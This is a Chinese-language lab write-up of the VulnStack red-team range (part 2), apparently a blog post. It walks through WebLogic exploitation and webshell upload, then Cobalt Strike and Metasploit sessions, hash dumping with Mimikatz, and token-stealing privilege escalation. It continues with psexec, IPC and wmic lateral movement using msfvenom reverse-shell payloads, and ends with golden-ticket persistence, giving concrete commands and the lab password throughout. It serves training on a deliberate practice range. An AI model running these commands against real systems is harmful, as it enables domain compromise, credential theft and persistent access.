【红日安全-VulnStack】ATT&CK实战系列——红队实战(二)
一、环境搭建
1.1 靶场下载
靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/
靶机通用密码: 1qaz@WSX
1.2 环境配置
拓朴图
下载好靶机打开vmx文件即可,由于DMZ网段为192.168.111.0/24,所以需要将子网ip设置为192.168.111.0
1.3 环境说明
DC:
IP:10.10.10.10
OS:Windows 2012
应用:AD域
WEB(初始的状态默认密码无法登录,切换用户 de1ay/1qaz@WSX 登录进去):
IP1:10.10.10.80
IP2:192.168.111.80
OS:Windows 2008
应用:Weblogic 10.3.6 MSSQL 2008
PC:
IP1:10.10.10.201
IP2:192.168.111.201
OS:Windows 7
攻击机:
IP:192.168.111.128
OS:Windows 10
IP:192.168.111.129
OS:Kali
内网网段:10.10.10.0/24
DMZ网段:192.168.111.0/24
先从WEB机开始,注意需要手动开启服务,在 C:\Oracle\Middleware\user_projects\domains\base_domain\bin 下有一个 startWeblogic 的批处理,管理员身份运行它即可,管理员账号密码:Administrator/1qaz@WSX
WEB机和PC机:计算机右键->管理->配置->服务->Server、Workstation、Computer Browser 全部启动
二、外网渗透
拿到环境后,首先进行端口探测,这里使用-sS参数,由于防火墙的存在不能使用icmp包,所以使用syn包探测
通过扫描端口,我们通过端口初步判断目标机存在的服务及可能存在的漏洞,如445端口开放就意味着存smb服务,存在smb服务就可能存在ms17-010/端口溢出漏洞。开放139端口,就存在Samba服务,就可能存在爆破/未授权访问/远程命令执行漏洞。开放1433端口,就存在mssql服务,可能存在爆破/注入/SA弱口令。开放3389端口,就存在远程桌面。开放7001端口就存在weblogic。
这里先看一下weblogic,直接使用 WeblogicScan 扫描一下可能存在的漏洞,工具地址:https://github.com/rabbitmask/WeblogicScan
命令:python3 WeblogicScan.py -u 192.168.111.80 -p 7001
使用 java 反序列化终极测试工具测试漏洞
上传冰蝎马,关于选择 webshell 上传路径问题,参考 https://www.cnblogs.com/sstfy/p/10350915.html
上传路径为:
C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\5f6ebw\war\shell.jsp
冰蝎连接 http://192.168.111.80:7001/uddiexplorer/shell.jsp
CS上线
CS派生MSF
三、内网渗透
3.1 凭据获取
右键->Access->Dump Hashes(需要Administrator权限)
右键->Access->Run Mimikatz
3.2 提权到system
ms14-058 提到 system 权限
也可以使用令牌窃取,提权
meterpreter > load incognito //加载incognito
meterpreter > getuid //查看当前token
meterpreter > list_tokens -u //列出可用token
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM" //token窃取,格式为impersonate_token"主机名\\用户名"
meterpreter > getuid //查看当前token
meterpreter > rev2self //返回之前的token
windows平台下的incognito.exe操作与此类似。
3.3 域信息收集
ipconfig /all,发现机器有双网卡,内网 10.10.10.1/24 网段,域控 ip 10.10.10.10 (域控一般是本机的DNS服务器)
运行portscan模块,扫描内网
查看域名 net config workstation
关闭防火墙 netsh advfirewall set allprofiles state off
查看有几个域 net view /domain
查看域内主机 nei view
查询域内用户 net user /domain #该命令在本环境中需要在system权限下执行
查看域管理员 net group "domain admins" /domain
查看域控 net group "domain controllers" /domain
3.4 psexec 传递
psexec 是微软 pstools 工具包中最常用的一个工具,也是在内网渗透中的免杀渗透利器。psexec 能够在命令行下在对方没有开启 telnet 服务的时候返回一个半交互的命令行,像 telnet 客户端一样。原理是基于IPC共享,所以要目标打开 445 端口。另外在启动这个 psexec 建立连接之后对方机器上会被安装一个服务。
获取凭据后对目标网段进行端口存活探测,因为是 psexec 传递登录,这里仅需探测445端口
命令:portscan ip网段 端口 扫描协议(arp、icmp、none) 线程
例如:portscan 10.10.10.0/24 445 arp 200
可看到域控机器DC开放了445端口
工具栏 View->Targets 查看端口探测后的存活主机
新建一个 Listener,Payload 选择 windows/beacon_smb/bind_pipe
存活主机右键->Login->psexec,选择之前获取到的凭据信息(明文密文均可),选择 Listener 及主机 Session
DC成功上线:
3.5 IPC连接
建立IPC$连接上传木马 建立后可以访问目标机器的文件(上传、下载),也可以在目标机器上运行命令。上传和下载文件直接通过copy命令就可以,不过路径换成UNC路径。
常用命令:
net use \\ip\ipc$ pawword /user:username 建立IPC连接
copy hacker.exe \\10.10.10.10\C$\windows\temp 复制本地文件到目标服务器
copy \\10.10.10.10\C$\windows\temp\hash.txt 复制目标服务器文件到本地
3.5.1 使用msf来中转路由
1.meterpreter生成payload.exe
msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.10.80 LPORT=8888 -f exe > /tmp/payload.exe
2.ipc连接
beacon> shell net use \\ip\ipc$ pawword /user:username
beacon> shell copy C:\Users\de1ay.DE1AY\Desktop\payload.exe \\10.10.10.10\c$\windows\temp\payload.exe
3.meterpreter进行监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.10.80
set lport 8888
4.在跳板机上通过wmic命令执行木马
beacon> shell wmic /node:10.10.10.10 /user:de1ay /password:1qaz@WSX process call create "C:\Windows\Temp\payload.exe"
成功上线:
sessions:
3.5.2 使用cobalt strike来中转路由
作进一步拓展
1.点击Listener 同meterpreter设置 lport ,lhost
2.生成木马,设置listener为刚才设置的
msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.10.80 LPORT=8888 -f exe > /tmp/payload.exe
3.ipc连接
beacon> shell net use \\ip\ipc$ pawword /user:username
beacon> shell copy C:\Users\de1ay.DE1AY\Desktop\payload.exe \\10.10.10.10\c$\windows\temp\payload.exe
4.在跳板机上通过wmic命令执行木马
beacon> shell wmic /node:10.10.10.10 /user:de1ay /password:1qaz@WSX process call create "C:\Windows\Temp\payload.exe"
5.如果是在dc.de1ay.com双击木马是普通权限,通过cs的中转路由是administrator权限,此时我们拿到域控的管理员权限
四、权限维持
4.1域控信息收集
在域控获得KRBTGT账户NTLM密码哈希和SID
4.2黄金票据利用
黄金票据是伪造票据授予票据(TGT),也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心(KDC)证明用户已被其他域控制器认证。
黄金票据的条件要求:
1.域名称
2.域的SID值
3.域的KRBTGT账户NTLM密码哈希
4.伪造用户名
黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的 system 权限了,还可以使用黄金票据做权限维持,当域控权限掉后,在通过域内其他任意机器伪造票据重新获取最高权限。
WEB机 Administrator 权限机器->右键->Access->Golden Ticket
伪造成功:
参考:
【红日安全-VulnStack】ATT&CK实战系列——红队实战(二)的更多相关文章
- ATT&CK实战系列 红队实战(一)————环境搭建
首先感谢红日安全团队分享的靶机实战环境.红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习.视频教程.博客三位一体学习. 靶机下载地址:http://vulnstack.qiyuanxue ...
- ATT&CK实战系列——红队实战(一)
一.环境搭建 1.环境搭建测试 最近想要开始学习内网渗透,搜集了一些教程,准备先实验一个vulnstack靶机,熟悉一下内网渗透操作再学习基础知识. 靶场下载地址:http://vulnstack.q ...
- ATT&CK实战系列——红队实战(二)
一.环境搭建 靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ DC IP:10.10.10.10OS:Windows 2012应用:A ...
- ElasticSearch实战系列七: Logstash实战使用-图文讲解
前言 在上一篇中我们介绍了Logstash快速入门,本文主要介绍的是ELK日志系统中的Logstash的实战使用.实战使用我打算从以下的几个场景来进行讲解. 时区问题解决方案 在我们使用logstas ...
- 靶机练习 - ATT&CK红队实战靶场 - 1. 环境搭建和漏洞利用
最近某个公众号介绍了网上的一套环境,这个环境是多个Windows靶机组成的,涉及到内网渗透,正好Windows和内网渗透一直没怎么接触过,所以拿来学习下. 下载地址:http://vulnstack. ...
- vulstack红队评估(二)
一.环境搭建: 1.根据作者公开的靶机信息整理: 靶场统一登录密码:1qaz@WSX 2.网络环境配置: ①Win2008双网卡模拟内外网: 外网:192.168.1.80,桥接模式与物理机相 ...
- ATT&CK 实战 - 红日安全 vulnstack (一) 环境部署
靶场描述: 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习.视频教程.博客三位一体学习.另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环.后续也会搭建真实APT实 ...
- ATT&CK 实战 - 红日安全 vulnstack (二) 环境部署(劝退水文)
靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 靶场简述 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习.视频教程.博 ...
- ATK&CK红队评估实战靶场 (一)的搭建和模拟攻击过程全过程
介绍及环境搭建 靶机地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2 官方靶机说明: 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练 ...
随机推荐
- SimpleChannelInboundHandler生命周期
转载:https://www.pianshen.com/article/1766171597/
- netty&websocket
1.先判断是不是http 消息,不是返回400,是则remove之前添加的http组件,动态添加websocket组件 添加WebSocket Encoder和WebSocket Decoder之后, ...
- day101:MoFang:模型构造器ModelSchema&注册功能之手机号唯一验证/保存用户注册信息/发送短信验证码
目录 1.模型构造器:ModelSchema 1.SQLAlchemySchema 2.SQLAlchemyAutoSchema 2.注册功能基本实现 1.关于手机号码的唯一性验证 2.保存用户注册信 ...
- 我在苦苦坚持的时候,WebStorm已经悄悄的“真香”起来
前言 最近接了一个活儿,是用WebStorm开发一个基于VUE的网站,但是我真的是几乎没接触过VUE相关的项目实践,更别说用WebStorm在实际中的应用,之前只是听朋友说多好用,但是,因为现有工具不 ...
- PyQt(Python+Qt)学习随笔:QTabWidget选项卡部件移除选项卡的removeTab和clear方法
老猿Python博文目录 专栏:使用PyQt开发图形界面Python应用 老猿Python博客地址 要从一个QTabWidget中去除选项卡,可用使用removeTab和clear方法. 1.移除选项 ...
- PyQt(Python+Qt)学习随笔:QTableWidget的findItems和selectedItems搜索项和访问选中项方法
老猿Python博文目录 专栏:使用PyQt开发图形界面Python应用 老猿Python博客地址 1.搜索项 在表格部件中,可以根据文本以及匹配模式来搜索满足条件的项,调用语法: list[QTab ...
- 软工团队作业--Scrum冲刺集合贴
软工团队作业--Scrum冲刺集合贴 团队 团队名称:广东靓仔六强选手 团队成员: 黄清山 黄梓浩 钟俊豪 周立 邓富荣 郑焕 博客链接 Scrum 冲刺 第一篇 Scrum 冲刺 第二篇 Scrum ...
- 第 2 篇Scrum 冲刺博客
每天举行会议 会议照片: 昨天已完成的工作与今天计划完成的工作及工作中遇到的困难: 成员姓名 昨天完成工作 今天计划完成的工作 工作中遇到的困难 蔡双浩 完成修改个人信息剩余部分 了解任务,并做相关学 ...
- js数组快速排序和冒泡排序
1.快速排序 var arr = [1, 2, 5, 6, 3, 1, 4]; function mySort(arr) { if (arr.length <= 1) { return arr; ...
- Apriori 算法-如何进行关联规则挖掘
公号:码农充电站pro 主页:https://codeshellme.github.io 在数据分析领域有一个经典的故事,叫做"尿布与啤酒". 据说,在美国西部的一家连锁超市发现, ...